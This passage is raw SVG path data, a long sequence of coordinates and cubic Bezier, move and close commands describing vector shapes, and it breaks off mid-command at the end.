1013.5686,276.10535 1013.9587,271.26675 C 1014.1947,268.33901 1013.2736,266.95776 1011.5311,267.62643 C 1010.7247,267.93588 1010.3869,268.84459 1010.738,269.75964 C 1011.2627,271.12699 1011.4571,271.07965 1012.1046,269.42689 C 1012.7959,267.66204 1012.8653,267.68922 1012.9297,269.75 C 1012.9684,270.9875 1012.6018,272 1012.115,272 C 1010.8411,272 1007.8162,267.10635 1008.4531,266.07583 C 1008.7481,265.59861 1008.3195,263.92382 1007.5009,262.35408 C 1005.6171,258.74219 1005.6189,257.23826 1007.5092,255.34795 C 1008.3392,254.5179 1008.7684,253.43434 1008.4629,252.94005 C 1008.1575,252.44575 1008.374,251.16978 1008.944,250.10455 C 1009.7698,248.56168 1010.5418,248.32631 1012.7403,248.94726 C 1014.2581,249.37598 1015.3717,250.2856 1015.2149,250.96863 C 1015.0581,251.65167 1015.4376,252.82229 1016.0581,253.57001 C 1016.9208,254.60954 1016.6777,255.64387 1015.0251,257.96475 C 1013.8364,259.63414 1013.3445,261 1013.9319,261 C 1014.5194,261 1015,261.675 1015,262.5 C 1015,263.84976 1017.2382,264.43621 1021.75,264.26865 C 1023.375,264.2083 1023.375,266.68204 1021.75,267.33772 C 1020.7887,267.72563 1020.8023,267.86034 1021.809,267.92105 C 1022.529,267.96447 1022.8399,268.45 1022.5,269 C 1022.1495,269.56716 1022.9896,270 1024.441,270 C 1025.9834,270 1027,270.5634 1027,271.41821 C 1027,272.19823 1027.2731,273.54823 1027.607,274.41821 C 1028.0108,275.47052 1027.6563,276 1026.548,276 C 1025.6317,276 1025.1646,276.45734 1025.5101,277.01631 C 1025.8555,277.57528 1026.5571,277.77373 1027.0691,277.45729 C 1029.2327,276.12011 1027.7762,281.29133 1025.3864,283.43182 C 1019.7318,288.49633 1018.8693,289.0614 1017.2143,288.78565 C 1016.1021,288.60032 1015.5488,289.11461 1015.6389,290.25 C 1015.7153,291.2125 1015.1225,292 1014.3215,292 C 1013.2843,292 1013.0533,291.35251 1013.5188,289.75 z M 1019.5,286 C 1020.2822,284.7344 1018.9584,284.7344 1017,286 C 1015.7073,286.8354 1015.7337,286.97149 1017.191,286.98469 C 1018.121,286.99311 1019.1601,286.55 1019.5,286 z M 1020.1157,272.71573 C 1019.2948,271.89476 1019,272.0275 1019,273.21821 C 1019,274.10823 1018.7196,275.66073 1018.377,276.66821 C 1017.9346,277.96878 1018.2582,277.82306 1019.4927,276.16573 C 1020.7721,274.44813 1020.9367,273.5367 1020.1157,272.71573 z M 1016.3616,275.5 C 1016.6782,274.675 1016.5014,274 1015.9686,274 C 1015.4359,274 1015,274.675 1015,275.5 C 1015,277.42067 1015.6246,277.42067 1016.3616,275.5 z M 1018.2672,271.08625 C 1018.6062,269.78989 1018.1599,269.01357 1016.8838,268.67987 C 1015.8477,268.40892 1015,268.59511 1015,269.09362 C 1015,269.59213 1015.45,270 1016,270 C 1016.55,270 1017,270.47656 1017,271.05902 C 1017,271.64148 1016.55,271.83992 1016,271.5 C 1015.45,271.16008 1015,271.35852 1015,271.94098 C 1015,273.7961 1017.7464,273.0776 1018.2672,271.08625 z M 1025.1491,271.74908 C 1024.3923,270.99226 1023.6627,270.9373 1023.0119,271.58809 C 1022.3611,272.23888 1022.7534,272.63114 1024.161,272.73717 C 1025.7706,272.85842 1026.0145,272.61452 1025.1491,271.74908 z M 1017.6667,266.54399 C 1017.6667,265.74318 1017.2843,265.32428 1016.817,265.61309 C 1016.3497,265.9019 1016.2263,266.5571 1016.5427,267.0691 C 1017.3513,268.37748 1017.6667,268.23016 1017.6667,266.54399 z M 1012.629,262.68918 C 1012.3291,261.54237 1012.6274,259.93177 1013.2919,259.11008 C 1014.2773,257.8915 1014.2235,257.75218 1013,258.35435 C 1012.175,258.7604 1012.5,258.35021 1013.7222,257.44282 C 1015.822,255.88383 1015.8601,255.63017 1014.4143,252.83432 C 1012.6765,249.47375 1009.5616,249.31752 1009.3952,252.5826 C 1009.3376,253.7133 1008.9797,256.29477 1008.5999,258.31921 C 1008.0306,261.35376 1008.1995,262 1009.5617,262 C 1010.5683,262 1011.0037,262.54792 1010.6759,263.40223 C 1010.0325,265.079 1010.903,266.178 1012.2266,265.35995 C 1012.7478,265.03783 1012.9289,263.83598 1012.629,262.68918 z M 997,285.2274 C 997,284.66779 998.1449,283.15019 999.54422,281.85496 C 1000.9435,280.55973 1002.795,278.18536 1003.6585,276.57859 C 1005.0348,274.01783 1005.3463,273.8675 1006.1821,275.36085 C 1006.9222,276.6834 1006.3933,277.78489 1003.8177,280.2847 C 999.06931,284.89351 997,286.39372 997,285.2274 z M 910,277 C 910,276.45 910.45,276 911,276 C 911.55,276 912,276.45 912,277 C 912,277.55 911.55,278 911,278 C 910.45,278 910,277.55 910,277 z M 910.70217,274.32712 C 910.35722,273.76897 910.60329,271.55454 911.24901,269.40615 C 912.28925,265.94511 912.46115,265.78927 912.75753,268.0385 C 913.15359,271.0442 911.6038,275.78598 910.70217,274.32712 z M 1006.6395,273.30615 C 1005.5133,272.17996 1005.9536,271 1007.5,271 C 1008.325,271 1009,271.42344 1009,271.94098 C 1009,273.20196 1007.4384,274.10508 1006.6395,273.30615 z M 773.66667,271.33333 C 772.3691,270.03577 773.02842,269.27605 775.25,269.50891 C 778.54631,269.85443 778.64394,269.93761 777,271 C 775.21113,272.15606 774.555,272.22167 773.66667,271.33333 z M 376,268 C 376,266.71862 376.70806,266.71862 377.5,268 C 377.83992,268.55 377.64148,269 377.05902,269 C 376.47656,269 376,268.55 376,268 z M 1093,267.55902 C 1093,267.31648 1093.45,266.83992 1094,266.5 C 1094.55,266.16008 1095,266.35852 1095,266.94098 C 1095,267.52344 1094.55,268 1094,268 C 1093.45,268 1093,267.80156 1093,267.55902 z M 372.01118,266.75 C 371.86753,266.3375 371.67456,265.6625 371.58235,265.25 C 371.49015,264.8375 370.82655,262.78235 370.10769,260.683 C 368.80676,256.88377 369.04987,255.29475 370.76947,256.35752 C 371.26586,256.66431 371.58899,257.94687 371.48754,259.20766 C 371.38609,260.46845 371.72426,261.77589 372.23903,262.11309 C 372.75381,262.45029 372.97189,263.80029 372.72367,265.11309 C 372.47545,266.42589 372.15483,267.1625 372.01118,266.75 z M 502.66667,262.33333 C 502.3,261.96667 502,261.20167 502,260.63333 C 502,260.00673 502.46577,260.06577 503.18333,260.78333 C 503.83417,261.43417 504.13417,262.19917 503.85,262.48333 C 503.56583,262.7675 503.03333,262.7 502.66667,262.33333 z M 505,258 C 505,257.45 505.45,257 506,257 C 506.55,257 507,257.45 507,258 C 507,258.55 506.55,259 506,259 C 505.45,259 505,258.55 505,258 z M 497,255.05902 C 497,254.47656 497.45,254 498,254 C 499.28138,254 499.28138,254.70806 498,255.5 C 497.45,255.83992 497,255.64148 497,255.05902 z M 313.23564,251.69194 C 310.29291,250.37886 310.38642,249 313.41821,249 C 316.36427,249 319,249.93985 319,250.99036 C 319,252.32044 315.57765,252.73698 313.23564,251.69194 z M 316.25,250.33772 C 315.5625,250.06031 314.4375,250.06031 313.75,250.33772 C 313.0625,250.61513 313.625,250.84211 315,250.84211 C 316.375,250.84211 316.9375,250.61513 316.25,250.33772 z M 334,251.86833 C 334,251.12716 332.63324,250.91998 330.03912,251.26793 C 327.51273,251.60679 325.70504,251.34953 325.04779,250.55759 C 323.95206,249.23731 324.62368,247.98997 326.41667,248.01531 C 327.0125,248.02373 326.825,248.46684 326,249 C 325.175,249.53316 324.95,249.96937 325.5,249.96937 C 326.83748,249.96937 329.77786,248.03914 328.5,248 C 327.95,247.98316 328.175,247.53316 329,247 C 330,246.35375 330.08333,246.02552 329.25,246.01531 C 328.5625,246.00689 328,245.57577 328,245.05726 C 328,243.64692 337.74703,243.99636 341.43925,245.53906 C 344.21951,246.70073 347.96277,249.83361 346.87244,250.08632 C 346.6676,250.1338 344.26773,250.30562 341.53939,250.46815 C 338.81106,250.63068 336.41106,251.26683 336.20606,251.88183 C 335.71955,253.34134 334,253.33082 334,251.86833 z M 339.25,249.09861 C 339.6625,249.04438 341.2375,248.9478 342.75,248.884 C 344.85779,248.79509 345.03294,248.65131 343.5,248.26832 C 342.4,247.99349 341.27049,247.40637 340.98998,246.9636 C 340.70947,246.52083 339.24697,245.84911 337.73998,245.47088 C 335.18857,244.83051 335,244.99953 335,247.92678 C 335,250.6108 335.25584,250.93345 336.75,250.1338 C 337.7125,249.61868 338.8375,249.15285 339.25,249.09861 z M 334,247 C 334,246.56769 333.42143,245.99196 332.71429,245.7206 C 331.96463,245.43293 331.42857,245.96636 331.42857,247 C 331.42857,248.03364 331.96463,248.56707 332.71429,248.2794 C 333.42143,248.00804 334,247.43231 334,247 z M 350,250.5 C 350,249.5 351,249 353,249 C 355,249 356,249.5 356,250.5 C 356,251.5 355,252 353,252 C 351,252 350,251.5 350,250.5 z M 354.25,250.33772 C 353.5625,250.06031 352.4375,250.06031 351.75,250.33772 C 351.0625,250.61513 351.625,250.84211 353,250.84211 C 354.375,250.84211 354.9375,250.61513 354.25,250.33772 z M 38.923489,248.75847 C 38.881408,248.61631 38.692539,247.68739 38.503782,246.69419 C 38.226745,245.23649 38.434266,245.11552 39.580293,246.06664 C 40.710837,247.00491 41,246.90241 41,245.56343 C 41,244.63862 41.45,244.16008 42,244.5 C 42.55,244.83992 43,245.43323 43,245.81847 C 43,246.48189 39.085319,249.30518 38.923489,248.75847 z M 313,244.22357 C 313,243.79654 314.75044,243.61408 316.88987,243.81811 C 319.0293,244.02213 321.6168,243.99235 322.63987,243.75192 C 324.16503,243.3935 323.95976,243.07869 321.5,242.00373 C 319.85,241.28266 317.95373,240.57903 317.28607,240.44012 C 316.61841,240.30121 314.70591,239.21471 313.03607,238.02568 C 311.36623,236.83665 310,236.13101 310,236.45759 C 310,236.78416 308.67235,236.3648 307.04966,235.52568 C 303.86653,233.87962 300,233.49215 300,234.81923 C 300,235.26981 302.30063,236.26494 305.11251,237.03064 C 307.92439,237.79634 310.44753,239.00268 310.7195,239.71141 C 310.99146,240.42013 312.29083,241 313.60699,241 C 314.92314,241 316,241.48032 316,242.06739 C 316,243.46964 311.8463,242.23442 310.38976,240.39902 C 309.77912,239.62956 308.34318,239 307.19877,239 C 306.05437,239 304.82524,238.52625 304.46738,237.94721 C 304.10951,237.36818 303.29546,237.08144 302.65836,237.31001 C 302.02126,237.53858 300.21849,237.07802 298.65221,236.28654 C 294.7154,234.2972 292.16524,233.92362 291.36466,235.21899 C 290.91974,235.93888 291.42781,236.12139 292.84501,235.75078 C 294.03177,235.44044 294.77972,235.5474 294.50712,235.98847 C 294.23452,236.42955 294.71242,237.05941 295.56913,237.38815 C 296.42583,237.7169 296.84668,238.43905 296.50437,238.99294 C 295.56666,240.51018 294,240.20182 294,238.5 C 294,236.73436 293.51488,236.65408 290.99495,238.0027 C 288.1746,239.51211 287.74482,237.58836 290.35463,235.13657 C 292.11324,233.48444 294.0287,232.94509 298.57381,232.82224 C 301.83321,232.73414 305.4,233.12333 306.5,233.6871 C 307.6,234.25087 312.47087,236.64223 317.32416,239.00122 C 323.41328,241.9609 325.7379,243.55051 324.82416,244.12983 C 323.15443,245.18847 313,245.26898 313,244.22357 z M 35.75,241.60795 C 33.484329,239.88807 33.519804,239.06167 35.833333,239.66667 C 36.841667,239.93035 37.666667,240.78822 37.666667,241.57305 C 37.666667,242.35787 37.629167,242.98569 37.583333,242.9682 C 37.5375,242.9507 36.7125,242.3386 35.75,241.60795 z M 327.22894,240.81318 C 327.72722,239.31834 330,238.49529 330,239.80968 C 330,240.34667 329.2874,241.05947 328.41644,241.39369 C 327.44253,241.76742 326.98536,241.54393 327.22894,240.81318 z M 30.5,239 C 30.160081,238.45 30.331966,238 30.881966,238 C 31.431966,238 32.160081,238.45 32.5,239 C 32.839919,239.55 32.668034,240 32.118034,240 C 31.568034,240 30.839919,239.55 30.5,239 z M 25,237 C 25,236.45 25.701558,236 26.559017,236 C 27.416476,236 27.839919,236.45 27.5,237 C 26.700321,238.29391 25,238.29391 25,237 z M 1008.2405,236.01357 C 1006.4856,233.2034 1006.6663,232.12626 1009.5209,228.38378 C 1012.6697,224.25538 1015.2317,224.70527 1013.9535,229.16216 C 1012.806,233.16307 1010.6404,238 1009.9964,238 C 1009.713,238 1008.9228,237.10611 1008.2405,236.01357 z M 1012.6027,230.23661 C 1012.9906,228.29691 1012.8453,227 1012.24,227 C 1010.6585,227 1008.0975,231.51668 1008.4916,233.61093 C 1008.687,234.64992 1008.8814,235.70893 1008.9235,235.96429 C 1009.1685,237.45098 1012.0601,232.94933 1012.6027,230.23661 z M 325.63617,235.50574 C 325.95154,234.6839 326.61976,234.265 327.1211,234.57484 C 328.16968,235.2229 327.32792,237 325.97237,237 C 325.47209,237 325.3208,236.32758 325.63617,235.50574 z M 322.18333,233.78333 C 321.5325,233.1325 321,232.20786 321,231.72857 C 321,231.24929 321.72857,231.58571 322.61905,232.47619 C 323.50952,233.36667 324.04202,234.29131 323.80238,234.53095 C 323.56274,234.7706 322.83417,234.43417 322.18333,233.78333 z M 311.89953,229.7173 C 310.85161,228.91908 310.54037,227.81032 310.998,226.50571 C 311.62858,224.70807 311.86093,224.83039 313.37414,227.75662 C 315.12133,231.1353 314.62592,231.79402 311.89953,229.7173 z M 318.01531,227.97076 C 318.00689,227.12968 317.1,225.79284 316,225 C 314.9,224.20716 314,222.93404 314,222.17083 C 314,221.15905 313.25511,220.96715 311.25,221.46235 C 309.43686,221.91015 308.84068,221.80521 309.5,221.15434 C 311.35374,219.32434 314.21683,219.46919 315.36736,221.45116 C 315.99031,222.5243 317.28491,224.0993 318.24424,224.95116 C 319.49667,226.06328 319.71246,226.92295 319.00956,228 C 318.14376,229.32665 318.02886,229.32327 318.01531,227.97076 z M 1034.2292,221.8125 C 1034.4469,221.15938 1035.1597,220.44677 1035.8132,220.22894 C 1036.5439,219.98536 1036.7674,220.44253 1036.3937,221.41644 C 1035.6962,223.23415 1033.6292,223.61236 1034.2292,221.8125 z M 530.59656,217.15623 C 530.25051,216.59631 530.45466,215.83704 531.05022,215.46896 C 532.5877,214.51875 533.57969,215.82031 532.2962,217.1038 C 531.57802,217.82198 531.01868,217.83923 530.59656,217.15623 z M 526.66667,216.33333 C 525.40539,215.07205 526.00357,214 527.96862,214 C 529.30765,214 529.75315,214.47971 529.36163,215.5 C 528.746,217.10429 527.74664,217.41331 526.66667,216.33333 z M 535,216.19112 C 535,214.98122 538.03905,211 538.96262,211 C 540.17339,211 537.75162,215.86627 536.25,216.45072 C 535.5625,216.7183 535,216.60148 535,216.19112 z M 1039.5,215 C 1039.8399,214.45 1040.568,214 1041.118,214 C 1041.668,214 1041.8399,214.45 1041.5,215 C 1041.1601,215.55 1040.432,216 1039.882,216 C 1039.332,216 1039.1601,215.55 1039.5,215 z M 523,214.05902 C 523,213.47656 523.45,213 524,213 C 525.28138,213 525.28138,213.70806 524,214.5 C 523.45,214.83992 523,214.64148 523,214.05902 z M 1043.5433,208.07002 C 1043.2568,207.60657 1043.9174,206.99335 1045.0112,206.70731 C 1046.1051,206.42127 1047,206.54697 1047,206.98663 C 1047,208.16156 1044.1516,209.05429 1043.5433,208.07002 z M 525.27083,199.39583 C 525.60312,199.06354 526.46563,199.02802 527.1875,199.31689 C 527.98523,199.63611 527.74828,199.87307 526.58333,199.92105 C 525.52917,199.96447 524.93854,199.72813 525.27083,199.39583 z M 1029,197 C 1029,196.45 1029.675,196 1030.5,196 C 1031.325,196 1032,196.45 1032,197 C 1032,197.55 1031.325,198 1030.5,198 C 1029.675,198 1029,197.55 1029,197 z M 495.51008,182.01631 C 495.16462,181.45734 495.58352,181 496.44098,181 C 498.19751,181 498.45614,181.60006 497.0691,182.45729 C 496.5571,182.77373 495.85554,182.57528 495.51008,182.01631 z M 485.27083,179.39583 C 485.60312,179.06354 486.46562,179.02802 487.1875,179.31689 C 487.98523,179.63611 487.74828,179.87307 486.58333,179.92105 C 485.52917,179.96447 484.93854,179.72813 485.27083,179.39583 z M 1111,153.5 C 1111.6847,152.675 1112.9508,152 1113.8136,152 C 1115.0694,152 1114.9951,152.29285 1113.4411,153.4682 C 1110.9015,155.38905 1109.4162,155.4084 1111,153.5 z M 1128,141.55902 C 1128,141.31648 1128.45,140.83992 1129,140.5 C 1129.55,140.16008 1130,140.35852 1130,140.94098 C 1130,141.52344 1129.55,142 1129,142 C 1128.45,142 1128,141.80156 1128,141.55902 z M 1130.5703,138.11369 C 1130.269,137.62622 1131.0103,136.96907 1132.2176,136.65335 C 1134.7376,135.99437 1135.485,136.40618 1134.5411,137.93347 C 1133.7418,139.2268 1131.326,139.33644 1130.5703,138.11369 z M 1135.6978,135.2527 C 1134.5847,133.2749 1131.8733,119.93047 1132.1672,117.87651 C 1132.3502,116.59697 1133.4363,115.08528 1134.5807,114.51721 C 1135.7251,113.94914 1136.4837,112.95119 1136.2665,112.29954 C 1136.0345,111.60363 1137.3459,110.83813 1139.4445,110.44444 C 1141.4096,110.07578 1144.026,108.99921 1145.2587,108.05205 C 1147.8538,106.05807 1156.6572,101.36725 1159.3134,100.56311 C 1160.3107,100.26117 1160.8672,99.5941 1160.5499,99.080736 C 1159.927,98.072912 1155.724,99.006978 1152.0612,100.96722 C 1149.6677,102.24819 1147,101.72873 1147,99.981695 C 1147,99.262925 1147.5629,99.215643 1148.6797,99.84061 C 1150.4178,100.81332 1158,97.671435 1158,95.978488 C 1158,94.603718 1163.8077,93.790408 1165.7118,94.898525 C 1167.3292,95.8398 1167.2827,95.942087 1165.225,95.969591 C 1163.5464,95.992028 1162.8038,96.731093 1162.3923,98.788741 C 1161.9829,100.83554 1161.1907,101.63076 1159.4148,101.77774 C 1158.084,101.88789 1155.2051,103.10795 1153.0174,104.489 C 1150.8297,105.87005 1148.7758,107 1148.4531,107 C 1148.1305,107 1146.4341,108.02974 1144.6833,109.28831 C 1142.9325,110.54689 1140.9375,111.60439 1140.25,111.63831 C 1137.4547,111.77626 1136.9105,112.0462 1137.5012,113.00187 C 1137.8417,113.5529 1136.9683,114.44176 1135.5602,114.97712 C 1132.4471,116.16072 1132.3015,118.65938 1134.7959,128.09244 C 1136.4493,134.34509 1136.6552,134.63308 1138.7913,133.67992 C 1140.03,133.1272 1141.3075,131.6231 1141.6301,130.33749 C 1141.9906,128.90127 1142.9583,128 1144.1398,128 C 1145.1974,128 1146.3533,127.2125 1146.7084,126.25 C 1147.5493,123.97108 1148.9902,123.0342 1151.6836,123.01531 C 1153.3086,123.00392 1153.9481,122.3067 1154.1836,120.28955 C 1154.4055,118.38859 1155.2466,117.37306 1157,116.88923 C 1158.375,116.5098 1158.885,116.1545 1158.1334,116.09968 C 1157.2739,116.03699 1156.9608,115.25775 1157.2897,114 C 1157.6217,112.7308 1157.3204,112 1156.4654,112 C 1153.6195,112 1154.0024,109.83095 1157.4371,106.49543 C 1159.4297,104.56029 1162.0055,103.04254 1163.2561,103.06661 C 1164.4903,103.09036 1168.8737,102.67499 1172.9972,102.14356 C 1177.1207,101.61213 1181.154,101.54644 1181.9602,101.99759 C 1182.8862,102.51582 1185.1474,101.94553 1188.1011,100.44877 C 1190.6724,99.145776 1193.8391,97.85116 1195.1381,97.57185 C 1196.4372,97.292539 1199.3,96.610345 1201.5,96.055863 C 1203.7,95.501381 1207.975,95.026972 1211,95.001621 L 1216.5,94.955528 L 1214,93 C 1212.625,91.924459 1211.95,91.016449 1212.5,90.982198 C 1213.05,90.947948 1212.3186,90.277972 1210.8747,89.493364 C 1209.4308,88.708756 1207.2813,88.25325 1206.098,88.481128 C 1204.9147,88.709007 1204.1864,88.50741 1204.4795,88.033136 C 1204.7726,87.558863 1204.4472,86.953411 1203.7562,86.687688 C 1203.0653,86.421966 1205.2577,86.393237 1208.6282,86.623846 C 1216.1204,87.136463 1220.8324,85.707855 1218.9862,83.483427 C 1218.3091,82.667542 1218.1477,81.94257 1218.6276,81.872377 C 1222.8059,81.261158 1224,81.431003 1224,82.636536 C 1224,83.502364 1225.1622,84 1227.1843,84 C 1228.9356,84 1232.3458,84.957192 1234.7625,86.127094 C 1238.547,87.9591 1239.4908,88.075301 1241.5659,86.964709 C 1243.3746,85.996745 1243.7088,85.354005 1242.9061,84.386912 C 1242.0555,83.361953 1242.7839,83.154378 1246.4693,83.371481 C 1249.0172,83.521569 1251.2898,83.340188 1251.5195,82.968412 C 1252.1148,82.005184 1247.6264,80.123807 1242.9487,79.375798 C 1239.6262,78.844523 1239.0601,78.993113 1239.5494,80.268033 C 1239.8722,81.109349 1239.7632,82.028313 1239.3071,82.310174 C 1238.1996,82.994685 1235.5368,80.928277 1234.7194,78.75 C 1234.3583,77.7875 1233.1126,77 1231.9513,77 C 1230.7901,77 1226.1538,75.698961 1221.6485,74.108802 C 1214.5627,71.607806 1197.1712,69 1187.5779,69 C 1185.7079,69 1185.4513,71.611936 1187.25,72.337719 C 1188.1193,72.688495 1188.0432,72.88945 1187,72.997564 C 1186.175,73.083066 1184.6,73.320881 1183.5,73.52604 C 1182.4,73.7312 1180.15,73.13427 1178.5,72.199529 C 1176.1683,70.878574 1173.2725,70.53328 1165.5,70.649405 C 1160,70.731578 1154.6,70.92556 1153.5,71.080475 C 1150.2683,71.535603 1145.8243,69.900267 1146.3772,68.459381 C 1147.168,66.398622 1144.6624,66 1130.9182,66 C 1122.4634,66 1118,65.632769 1118,64.937142 C 1118,64.35257 1117.2125,63.985575 1116.25,64.121598 C 1113.6536,64.488525 1108,62.980172 1108,61.920545 C 1108,60.486039 1103.2143,60.837845 1099.9805,62.510065 C 1096.5268,64.296062 1094.9637,64.121021 1093.1933,61.75 C 1091.5511,59.550643 1080.8749,59.240891 1079.1311,61.342009 C 1078.5185,62.080114 1078.3134,62.980114 1078.6753,63.342009 C 1079.8531,64.519791 1059.656,64.60671 1054.25,63.447125 C 1052.0961,62.985124 1051,63.129436 1051,63.875 C 1051,64.49375 1050.325,65 1049.5,65 C 1048.675,65 1048,65.43875 1048,65.975 C 1048,67.46477 1041.8893,65.975146 1038.6147,63.687114 C 1036.0149,61.870626 1035.8941,61.550598 1037.3941,60.453808 C 1038.9368,59.325696 1038.9284,59.183948 1037.2794,58.518612 C 1036.3007,58.123755 1033.2891,57.627575 1030.587,57.415991 C 1027.8848,57.204407 1024.9108,56.789092 1023.9782,56.493068 C 1023.0455,56.197045 1021.7137,56.640004 1021.0187,57.477422 C 1019.3274,59.515367 1006.7524,59.529549 1001,57.5 C 996.18851,55.802408 988,55.487466 988,57 C 988,58.366582 985.38634,58.25822 983.04249,56.794461 C 981.51815,55.842495 978.734,55.924297 969.80606,57.183362 C 963.58773,58.060304 957.6,59.089532 956.5,59.470536 C 954.53682,60.150517 954.53542,60.134386 956.42373,58.594356 C 957.48179,57.731453 959.95679,56.734575 961.92373,56.379072 C 963.89068,56.023569 966.625,55.177971 968,54.499964 C 969.375,53.821957 973.5375,52.674542 977.25,51.950154 C 980.9625,51.225765 984,50.265639 984,49.816541 C 984,49.367444 983.6625,49.053289 983.25,49.118421 C 981.30941,49.424829 979.93702,48.910924 980.4555,48.071996 C 981.42249,46.507381 977.19953,45.79235 968.65538,46.074001 C 964.04264,46.226056 959.27714,45.833981 957.6849,45.171418 C 956.1366,44.527138 953.8866,43.959415 952.6849,43.909812 C 951.16705,43.847158 951.56546,43.514151 953.98987,42.819064 C 956.52181,42.093147 958.01572,42.153235 959.43242,43.037975 C 960.50639,43.708684 966.23781,44.616552 972.16891,45.055459 C 982.64009,45.830339 987.65733,47.452345 986.18394,49.586325 C 985.80777,50.131139 983.925,51.564513 982,52.771601 C 980.075,53.978689 979.03594,54.973888 979.69098,54.983153 C 980.34602,54.992419 981.16008,54.55 981.5,54 C 981.83992,53.45 982.87898,53.006891 983.80902,53.015313 C 985.26629,53.028509 985.29269,53.164601 984,54 C 982.12065,55.214527 981.63268,55.142527 993.43364,55.391924 C 1000.1036,55.532885 1003.4986,55.99581 1003.767,56.800929 C 1004.0301,57.590449 1006.72,58 1011.6424,58 C 1015.7881,58 1018.8716,57.601245 1018.5648,57.104785 C 1017.4023,55.223953 1021.3198,55.044003 1033.8217,56.403958 C 1036.1986,56.66252 1038.7375,57.367147 1039.4636,57.969795 C 1041.2203,59.427763 1042.1029,63 1040.7064,63 C 1038.556,63 1041.4864,64.826289 1044.1719,65.159796 C 1045.8157,65.363939 1048.0509,64.599189 1049.9808,63.172287 C 1052.4218,61.367597 1053.426,61.108645 1054.5063,62.005263 C 1055.7282,63.019321 1060.4413,63.310128 1071.75,63.069231 C 1073.7895,63.025786 1074.9069,62.534429 1074.75,61.75 C 1074.6094,61.046957 1075.7033,60.361544 1077.25,60.183578 C 1078.7625,60.009545 1080,59.498864 1080,59.04873 C 1080,57.54854 1110.7193,60.319343 1112.3683,61.968262 C 1112.9357,62.535718 1114.4084,63 1115.641,63 C 1116.8735,63 1118.16,63.449788 1118.4997,63.99953 C 1118.8623,64.586142 1124.1538,64.958812 1131.3087,64.901636 C 1142.9274,64.808789 1149.6973,66.062771 1148.4523,68.07713 C 1147.7635,69.191672 1149.4262,70.021193 1152.1607,69.927247 C 1153.4473,69.883044 1158.775,69.767493 1164,69.670467 C 1169.225,69.573441 1174.625,69.153416 1176,68.737077 C 1179.0222,67.821983 1182.2915,69.489183 1180.1655,70.861262 C 1179.1372,71.524875 1179.2839,71.84098 1180.8048,72.238694 C 1182.9347,72.795683 1186.0439,71.52271 1184.1452,70.871051 C 1183.484,70.644112 1183.4006,69.958281 1183.9305,69.105211 C 1184.6622,67.9274 1186.9445,67.895497 1198.6015,68.900127 C 1211.7615,70.034295 1225.5198,73.068965 1234,76.708007 C 1235.925,77.534067 1239.525,78.329445 1242,78.475514 C 1244.475,78.621583 1248.1706,79.549619 1250.2124,80.537817 C 1253.5665,82.161136 1253.7595,82.460094 1252.2124,83.635467 C 1251.2706,84.350976 1249.2359,84.950705 1247.691,84.968197 C 1246.146,84.985688 1245.1038,85.358986 1245.375,85.797746 C 1245.6462,86.236506 1245.4978,87.194608 1245.0452,87.926861 C 1243.932,89.728089 1233.1082,88.445529 1232.331,86.420301 C 1231.9872,85.524199 1230.3249,85 1227.8273,85 C 1225.65,85 1222.9438,84.505104 1221.8136,83.900232 C 1220.6476,83.276197 1220.0224,83.227184 1220.3683,83.786925 C 1221.1321,85.022704 1219.3667,86.452099 1215.5625,87.678227 C 1212.6566,88.61482 1212.6458,88.645833 1214.5625,90.5625 C 1218.2292,94.229172 1217.1074,95.450259 1209.5,96.073234 C 1202.3823,96.656106 1187.7274,101.11151 1185,103.52176 C 1183.7563,104.62081 1183.1921,104.62149 1181.6985,103.52574 C 1179.7337,102.08443 1172.4083,102.55266 1170.25,104.2575 C 1169.4105,104.92066 1169,104.88662 1169,104.15383 C 1169,103.55247 1168.2623,103.34585 1167.3564,103.69349 C 1166.4524,104.04038 1164.5702,104.38523 1163.1738,104.45983 C 1161.7774,104.53442 1160.4388,105.1837 1160.1991,105.90267 C 1159.8942,106.81729 1160.3743,107.01598 1161.7975,106.56426 C 1164.7173,105.63757 1165.3866,107.50283 1162.5913,108.77644 C 1161.1003,109.45581 1159.8972,109.49716 1159.2899,108.88989 C 1158.2167,107.81669 1155,108.72931 1155,110.10699 C 1155,110.59814 1156.1801,111 1157.6224,111 C 1159.9512,111 1160.0912,111.18623 1158.8724,112.66262 C 1157.8025,113.95881 1157.7755,114.41796 1158.75,114.74595 C 1161.1109,115.54057 1160.0781,118 1157.3834,118 C 1155.1275,118 1154.8331,118.34662 1155.2476,120.51503 C 1155.6445,122.59109 1155.2721,123.12929 1153.1142,123.59855 C 1148.4459,124.61375 1147.9018,124.94881 1148.2031,126.62303 C 1148.3852,127.63475 1147.7265,128.39302 1146.5,128.58361 C 1145.4,128.75454 1143.6,129.9854 1142.5,131.31884 C 1140.1937,134.11458 1136.3185,136.35569 1135.6978,135.2527 z M 1162,96.531385 C 1162,95.639301 1161.4134,95.287868 1160.5057,95.63617 C 1159.6839,95.95154 1159.2605,96.612416 1159.5648,97.104785 C 1160.4374,98.516708 1162,98.148774 1162,96.531385 z M 976.5,54 C 976.83992,53.45 976.66803,53 976.11803,53 C 975.56803,53 974.83992,53.45 974.5,54 C 974.16008,54.55 974.33197,55 974.88197,55 C 975.43197,55 976.16008,54.55 976.5,54 z M 1224,133 C 1224,132.45 1224.7016,132 1225.559,132 C 1226.4165,132 1226.8399,132.45 1226.5,133 C 1225.7003,134.29391 1224,134.29391 1224,133 z M 1228.125,133.125 C 1228.5432,131.87026 1230,131.57891 1230,132.75 C 1230,133.1625 1229.4938,133.66875 1228.875,133.875 C 1228.2562,134.08125 1227.9188,133.74375 1228.125,133.125 z M 1216,132 C 1216,130.71862 1216.7081,130.71862 1217.5,132 C 1217.8399,132.55 1217.6415,133 1217.059,133 C 1216.4766,133 1216,132.55 1216,132 z M 121.19876,128.89007 C 117.58839,125.36026 117.81896,124 122.02763,124 C 124.20972,124 124.79257,124.37699 124.35866,125.50772 C 124.04045,126.33697 124.51495,128.13697 125.4131,129.50772 C 127.81197,133.16886 125.18078,132.78323 121.19876,128.89007 z M 1235.6649,131.00033 C 1236.8717,130.51372 1239.0844,130.50374 1240.6649,130.97776 C 1243.1146,131.71251 1242.8203,131.83116 1238.5,131.85066 C 1234.6799,131.8679 1234.0109,131.66724 1235.6649,131.00033 z M 1191.5,129 C 1191.1601,128.45 1191.557,128 1192.382,128 C 1193.207,128 1194.1601,128.45 1194.5,129 C 1194.8399,129.55 1194.443,130 1193.618,130 C 1192.793,130 1191.8399,129.55 1191.5,129 z M 1256.4243,128.08368 C 1258.3694,125.93429 1260,125.36693 1260,126.83948 C 1260,127.3012 1258.7712,128.23886 1257.2693,128.92317 C 1254.5454,130.16424 1254.5433,130.16213 1256.4243,128.08368 z M 0,125.5 C 